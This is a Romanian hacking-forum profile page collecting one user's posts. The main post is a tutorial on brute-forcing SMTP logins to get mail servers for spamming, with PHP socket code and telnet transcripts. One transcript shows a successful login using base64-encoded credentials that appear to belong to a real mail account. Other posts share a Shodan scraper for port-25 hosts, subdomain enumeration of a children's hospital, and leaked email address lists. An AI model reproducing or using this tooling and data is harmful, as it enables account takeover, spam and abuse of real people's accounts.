Jump to content

mojito.mojito

Members
 View Profile  See their activity

  • Posts

    49

  • Joined

  • Last visited

 Content Type 

Everything posted by mojito.mojito

  1. mojito.mojito
    dupa ceva timp o sa iti ceara ei bani tie Nigerienii sunt ca aia din Valcea!!! Se ocupa cu frauda!!
  2. mojito.mojito
    Spre exemplu eu am o baza de date de cateva un miliard doua de domenii as putea face si eu ceva de genu ca in acel site.
  3. mojito.mojito
    root@localhost:~/Downloads/php# ./bing 80 ./bing: 16: ./bing: +: not found \e[0m-e \e[1;37;1m[\e[1;32;1m+\e[1;37;1m]BING: 0 of 9125370 @ip2host\e[0m./bing: 16: ./bing: +: not found \e[0m-e \e[1;37;1m[\e[1;32;1m+\e[1;37;1m]BING: 0 of 9125370 @ip2host\e[0m./bing: 1 root@localhost:~/Downloads/php# ./clean urls.txt root@localhost:~/Downloads/php# cat www av.cookchildrens.org cookiris.cookchildrens.org credapply.cookchildrens.org ess.cookchildrens.org secure.cookchildrens.org www.berkeley-public.org www.campsanguinity.org www.centerforchildrenshealth.org www.cookchildrenshomehealth.com www.cookchp.com www.cookchp.org www.pedspal.org La mine merge! cine il vrea sami dea pm ca vil dau al toti care imi dau pm
  4. mojito.mojito
    normal ca nu merge daca te uiti in sursa si te uiti la regex folosita in acel script e diferit si normal ca nu prinde nimic.... doar un singur parametru trebuie schimabt si apoi merge ......... vhosts=`cat "$out"| egrep -o "<h3><a href=\"[^\"]+" $out |cut -d '"' -f 2` if [[ "$vhosts" -eq "" ]]; then vhosts=`cat "$out"| egrep -o "<h2><a href=\"[^\"]+" $out |cut -d '"' -f 2` fi in sfarsit!!!!
  5. mojito.mojito
    Scuzatima deabia acum am vazut postul... Da nenica dar smtpurile si mailurile nu le mai pui la cont? stiu ca tomato e gratis, dar trebuie sa si stii unde sal cauti.... mojito.mojito, la mine dece nu ai mai raspuns bro tiam dat 60k adresse hotmail si miai dat ignore?? vb de alti cand tu esti cum esti?? Daca miai dat 60k de mailuri, eu numi aduc aminte si sigur nu tiam dat ignore.. contacteazama pe icq ca numi aduc aminte ce nume ai acolo... oricum, am toate logurile pastrate de la chat cum esti online scriemi si verificam imediat.
  6. mojito.mojito
    e deajuns sa citesti aici:D https://rstforums.com/forum/95551-salutare-smtp-scaner-requested-2.rst Precum am promis , o sa va dau o veste tocmai am facut rost de SCANNER si unul foarte bun Multumesc foarte mult lui @mojito.mojito un om de treaba ( JOS PALARIA ) . Asta rezulta ca mai exista si omaeni buni care sunt bine intentionati fara interese ! Sanatate Multa Ca iam dat iam dat mai multe decat scanner ecc ecc din pacate lam sters din lista dupa faza aia si nu mai am logurile la conversatie. Infine nu sunt genul de persoana care se plange, pentru mine a fost nimica toata..... Plm nu ma intereseaza, doar e jigodie
  7. mojito.mojito
    Iam dt materiale in valoare de 500 euro ca se plangea ca moare de foame.. cand iam zis sami zica smecheria la scannerul sau (Chiar daca iam gasito pe urma) mia pus imediat pretul in fata etc etc... o jigodie de persoana
  8. mojito.mojito
    E un brute ssh
  9. mojito.mojito

    4$

    mojito.mojito posted a topic in Off-topic

    664356090 : 14:19ai fugit cu 4$ nene? 664356090 : 01:27mai dami o data btcul tau sa iti dau 10$ ca vad ca esti intro situatie foarte naspa 01:27...... kayn beet : 01:28ok 01:281AC9z9fzV4bkycdvng2nSprm8NbLvYvxzU 664356090 : 01:28vai de pula ta nenica kayn beet : 01:28ce sa fac sa raman boschetar uite ca l'am gasit si pe ala care ma ars de 4$ hahaahahahahah si eu care credeam ca e imposibil
  10. mojito.mojito
    hahaahaaha asa mia venit ce sai fac
  11. mojito.mojito
    https://www.sendspace.com/file/22a0py 9610 Emails hint: B64 -> ATOM
  12. mojito.mojito
    //Double sorry
  13. mojito.mojito
    deschide cu Vim de pe un linux, Vim e facut ca sa deschida fisiere foarte mari. pe windows cu notepad, notepad++, sublime text, atom nu o sa ai nici o sansa sal deschizi
  14. mojito.mojito
    oooh acum am vazut si eu int in loop, eu m-am oprit la gets() ca nu-mi place.
  15. mojito.mojito
    incearca fgets() sau getchar() acum nu stiu bine de ce in ASCII iti baga in chineza, dar incearca astea doua functii
  16. mojito.mojito
    <?php function curl_connect($url) { $headers[] = "Accept: text/html"; $headers[] = "Connection: Keep-Alive"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //che poi includo tutto nella var $exec curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); $exec = curl_exec($ch); if($exec) curl_close($ch); if(preg_match("/200 ok/i", $exec)) return true; else return false; } function login_shodan($user, $pass) { $headers[] = "Accept: text/html"; $headers[] = "Connection: Keep-Alive"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://account.shodan.io/login"); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_HEADER, true); //curl_setopt($ch, CURLOPT_REFERRER, ""); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //che poi includo tutto nella var $exec curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"username={$user}&password={$pass}&continue=https://www.shodan.io/"); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); $exec = curl_exec($ch); if($exec) curl_close($ch); if(preg_match("/200 ok/i", $exec)) return true; else return false; } function shodan_search($val, $pag) { $headers[] = "Accept: text/html"; $headers[] = "Connection: Keep-Alive"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://www.shodan.io/search?query=". urlencode("port:25") . "&page=" . intval($pag)); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //che poi includo tutto nella var $exec curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); $exec = curl_exec($ch); if($exec) curl_close($ch); //print $exec; //<div class="results-count">Showing results 1 - 10 of 18,046,644</div> //<div class="ip"><a href="/host/12.155.204.131">12.155.204.131</a> //<pre>220 MCG-EX01.McGeeGroup.local Microsoft ESMTP MAIL Service ready at Tue, 11 Nov 2014 02:42:44 -0500</pre> //<div class="search-result-summary"><span>204.15.253.98.icertified.net</span><br/><a href="/search?query=port%3A25+org%3A%22Certified+Hosting%22" class="os">Certified Hosting</a> //<div class="search-result-summary"><a href="/search?query=port%3A25+org%3A%22S.H.A.+Trans+SRL%22" class="os">S.H.A. Trans SRL</a> if(preg_match_all("/<div class=\"results-count\"\>Showing results (.*)<\/div\\>/i", $exec, $matches)) //print_r($matches); print "Risultati: " . $matches[1][0] . "\n"; if(preg_match_all("/<div class=\"ip\"><a href=\"(.*)\">(.*)<\/a>\n<\/div>\n<div class=\"search-result-summary\"><span>(.*)<\/span><br\/>/i", $exec, $matches)) { ///preg_match_all("/<div class=\"search-result-summary\"><span>(.*)<\/span><br\/>/i", $exec, $host); print_r($matches); $c = 0; preg_match_all("/<div class=\"ip\"><a href=\"(.*)\">(.*)<\/a>\n<\/div>\n<div class=\"search-result-summary\"><a href/i", $exec, $without); print_r($without); //print_r($matches); echo "Echo i 10 risultati della pagina {$pag}:\n"; echo "Scrivo su shodan-page-{$pag}\n"; //$fp = fopen("shodan-page-{$pag}", "a+"); //fwrite($fp, "Page {$pag}\n"); preg_match_all("/([^<]*)<\/pre>/i", $exec, $match_banners); foreach($without[2] as $ip) { $c++; print $ip . " - " . $match_banners[1] . "\n"; //fwrite($fp, $without[2][$i] . " - " . $match_banners[1][$i] . "\n"); } //fclose($fp); echo "Scritti {$c} Dati\n"; //print_r($match_banners); } unlink("cookie.txt"); } if(curl_connect("https://www.shodan.io")) { echo "Connesso a https://www.shodan.io\n"; echo "Login in corso...\n"; if(login_shodan("USER", "PASS")) { echo "Loggato con user USER\n"; echo "Ora cerco " . $argv[1] . "\n"; shodan_search($argv[1], $argv[2]); } else{ echo "Errore Log In\n"; } } else { echo "Errore di connessione alla homepage di shodan.io"; } ?> Mie imi place mai mult sa stau din terminal decat aplicatii Desktop, am facut asta pentru mine ceva timp in urma ca eu stau aproape non stop pe shodan si scanhub. API ce pun ei la dispozitie nu imi place cum lucreaza si asa ca miam facut eu scriptul asta pentru cautare si organizare a rezultatelor, poate ajuta pe cineva. :DDD
  17. mojito.mojito
    aa pe naiba primul lucru ce imi venise in minte, poti sa pui ce vrei tu acolo daca vezi am utilizat si EHLO mojito
  18. mojito.mojito
    Simple Mail Transfer Protocol - Wikipedia, the free encyclopedia EHLO pentru a imi da posibilitatea de a face autentificarea, deobicei HELO e urmarit de numele domeniu si iti da posibilitatetea de a trimite mail print comenzile MAIL, RCPT, etc etc
  19. mojito.mojito
    cum am zis aici nu am vorbit despre TLS sau SSL
  20. mojito.mojito
    http://www.pwnthecode.org/offline/ Nu Mysql injection ci sql inection, caci tu injectezi cu cod sql, mysql e un rdbms
  21. mojito.mojito
    Astazi am decis sa explic tuturor celor care tot cauta scannere/brute si mai stiu eu ce pentru a prinde servere smtp. Motivul este ca peste tot vad ceva de genu: - scanner smtp 2012 - new scanner smtp 2014 - prinde 100 smtpuri pe zi - scanner plm 2015 - 300 pe zi Sincer e penibil. Nu stau sa explic definita protocolului SMTP ca sunt o gramada de ghiduri pe internet, doar facand un exemplu: wikipedia. Sa incepem, Un brute pentru smtp e simplu un script care incearca sa faca login stand dupa definitia protocolui, si puntr-un loop incearca login cu mai multe usere si parole, asta e clasicul tip de brute cu dictionar. Pentru a te conecta la uns erver prin smtp se paote face prin portul 25, 587, 465 si nu stiu altele porturi care sunt acum noi. Portul 25 daca cititi pe internet e spart de spam si acum se incearca sa se adapteze si pe alte porturi. Astazi vreau sa vorbesc despre simplu acces smtp fara tls, ssl. pentru a intelege pasii de facut pentru a loga pur si simplu se poate face prin telnet din cmd sau orice alt terminal: telnet smtp.comcast.com 25/587: [mojito@baubau HOSTNAMES]$ telnet smtp.comcast.net 25 Trying 68.87.20.6... Connected to smtp.comcast.net. Escape character is '^]'. 220 resomta-ch2-12v.sys.comcast.net comcast ESMTP server ready Avem un raspuns cu codul 220 asta inseamna ca portul 25 in iesire la noi in pc e deschis si ca serverul accepta conexiuni si acum sta in asteptare de alte comenzi. <?php $socket = fsockopen($domain, 25, $errno, $errstr, 10); if (!$socket) exit(0); $buff = fgets($socket, 512); if (substr(trim($buff), 0, 3) != "220") exit(0); //daca primele 3 cifre nu sunt 220 conexiunea se termina print $buff\n; ?> Un simplu exemplu de a se conecta prin php. Urmatoarea comanda e de a spune serverului ca esti acolo, un gen de salut sa zicem, prin comanda EHLO sau HELO. Diferentele dintre EHLO si HELO va recomand pur si simplu wikipedia. Pentru a face autentificarea noi com utiliza comanda EHLO urmata de orice nume vreti. [mojito@baubau HOSTNAMES]$ telnet smtp.comcast.net 25 Trying 68.87.20.6... Connected to smtp.comcast.net. Escape character is '^]'. 220 resomta-ch2-04v.sys.comcast.net comcast ESMTP server ready ehlo mojito 250-resomta-ch2-04v.sys.comcast.net hello [192.64.83.46], pleased to meet you 250-HELP 250-AUTH LOGIN PLAIN 250-SIZE 36700160 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-STARTTLS 250 OK urmarind logica protocolului acum urmeaza sai dam comanda la server zicandui ca vrem sa ne logam la el cu user si parola prin comanda AUTH LOGIN: [mojito@baubau HOSTNAMES]$ telnet smtp.comcast.net 25 Trying 68.87.20.6... Connected to smtp.comcast.net. Escape character is '^]'. 220 resomta-ch2-05v.sys.comcast.net comcast ESMTP server ready ehlo user 250-resomta-ch2-05v.sys.comcast.net hello [192.64.83.46], pleased to meet you 250-HELP 250-AUTH LOGIN PLAIN 250-SIZE 36700160 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-STARTTLS 250 OK auth login 334 VXNlcm5hbWU6 Raspunsul 334 urmarit de: VXNlcm5hbWU6 inseamna ca asteapta sa introduceti userul, pentru mai multe detalii in privinta acestui raspuns va invit sa citi RFC'ul respectiv ce explica toate comenzile in mod detaliat. <?php $socket = fsockopen($domain, 25, $errno, $errstr, 10); if (!$socket) exit(0); $buff = fgets($socket, 512); if (substr(trim($buff), 0, 3) != "220") exit(0); //daca primele 3 cifre nu sunt 220 conexiunea se termina print $buff\n; fputs($socket, "EHLO USER\r\n"); //precum standardului \r\n sunt obligatorii pentru a zice serverului ca ai terminat comanda si sa mearga mai departe $buff = fgets($socket, 512); if (substr(trim($buff), 0, 3) != "250") exit(0); //daca nu gasim raspunsul 250 iesim din program. codul 250 inseamna ca serverul a acceptat comanda //se poate face printr-un loop pentru a vedea tot raspunsul protocolului, dar ajung sa gasesti un singur 250 in raspuns fputs($socket, "AUTH LOGIN\r\n"); if (substr(trim($buff), 4, 16) != "VXNlcm5hbWU6") exit(0); //daca nu gasim acest string iesim din program $user = base64_encode("USER"); //precum standardului smtp accepta userul criptat in base64 fputs($socket, "$user\r\n"); ?> O data pus userul vedem daca accepta userul si daca ne trimite mai departe pentru a baga si parola: [mojito@baubau HOSTNAMES]$ telnet smtp.comcast.net 25 Trying 68.87.20.6... Connected to smtp.comcast.net. Escape character is '^]'. 220 resomta-ch2-05v.sys.comcast.net comcast ESMTP server ready ehlo mojito 250-resomta-ch2-05v.sys.comcast.net hello [192.64.83.46], pleased to meet you 250-HELP 250-AUTH LOGIN PLAIN 250-SIZE 36700160 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-STARTTLS 250 OK auth login 334 VXNlcm5hbWU6 ZC5sYXVnaGxpbkBjb21jYXN0Lm5ldA== 334 UGFzc3dvcmQ6 raspunsul 334 si acel string functioneaza ca si pentru user, asta inseamna ca userul a fost acceptat si acum serverul asteapta sa introduceti parola, si parola bineinteles in base64. <?php $socket = fsockopen($domain, 25, $errno, $errstr, 10); if (!$socket) exit(0); $buff = fgets($socket, 512); if (substr(trim($buff), 0, 3) != "220") exit(0); //daca primele 3 cifre nu sunt 220 conexiunea se termina print $buff\n; fputs($socket, "EHLO USER\r\n"); //precum standardului \r\n sunt obligatorii pentru a zice serverului ca ai terminat comanda si sa mearga mai departe $buff = fgets($socket, 512); if (substr(trim($buff), 0, 3) != "250") exit(0); //daca nu gasim raspunsul 250 iesim din program. codul 250 inseamna ca serverul a acceptat comanda //se poate face printr-un loop pentru a vedea tot raspunsul protocolului, dar ajung sa gasesti un singur 250 in raspuns fputs($socket, "AUTH LOGIN\r\n"); if (substr(trim($buff), 4, 16) != "VXNlcm5hbWU6") exit(0); //daca nu gasim acest string iesim din program $user = base64_encode("USER"); //precum standardului smtp accepta userul criptat in base64 fputs($socket, "$user\r\n"); if (!($buff = fgets($socket, 512))) exit(0); if (substr(trim($_SockResult), 4, 16) != "UGFzc3dvcmQ6") exit(0); $pass = base64_encode("PASSWORD"); fputs($socket, "$pass\r\n"); if(substr(trim($vuff), 0, 3) != "235") { print "Invalid login\n"; exit(0); } else { print "Login facut cu success\n"; } ?> [mojito@baubau HOSTNAMES]$ telnet smtp.comcast.net 25 Trying 96.114.157.81... Connected to smtp.comcast.net. Escape character is '^]'. ehlo mojito 220 resomta-po-09v.sys.comcast.net comcast ESMTP server ready 250-resomta-po-09v.sys.comcast.net hello [192.64.83.46], pleased to meet you 250-HELP 250-AUTH LOGIN PLAIN 250-SIZE 36700160 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-STARTTLS 250 OK auth login 334 VXNlcm5hbWU6 ZC5sYXVnaGxpbkBjb21jYXN0Lm5ldA== 334 UGFzc3dvcmQ6 Mzc3M2psYWQ= 235 2.7.0 ... Authentication succeeded O data ce am introdus parola dupa cum puteti vedea am facut cu success autentificarea. Daca autentificarea a avut success prin simpla comanda quit se poate deconecta de la server si a trece la urmatorul. Ghidul acesta a fost ceva general pentru a da o idee ficaruia cum functioneaza protocolul smtp. In 2012, 2013, 2015 protocolul a ramas acelasi deci cand eu aud : scanner smtp 2015 / prinde 300 pe zi ma enervez foarte rau. Da am inteles ca poti sal faci sa mearga mai rapid prin multithreading , poti sa faci controale mai bune la raspunsurile serverului, poti face un check pe portul respectiv si apoi sa faci brute doar pe ip'uri sau hosturi care au portul deschis, poti sa folosesti alt limbaj de programare care gestioneaza mai bine multithreading, poti avea un "root" puternic care e capabil sa deschida multe procese pentru multithreading, sau mai stiu eu ce, dar protocolul smtp ramane acelasi in orice caz, te poti juca cu usere si parole cum vrei tu, dar daca nu ai "root" bun ce poate sa faca cum am zis mai sus si bineinteles merge mai rapid si ai mai multe probabilitati sa gasesti smtpuri intr-un timp mai scurt si de a rula foarte multe hosturi sau ip'uri. Pentru mai multe detalii va invit sa cititi despre acest protocol. Va multumesc pentru atentie
  22. mojito.mojito
    Salut tuturor, sunt de ceva timp inregistrat dar doar acum am decis sa ma prezint si sa fiu activ. Bine v-am gasit
×
×
  • Create New...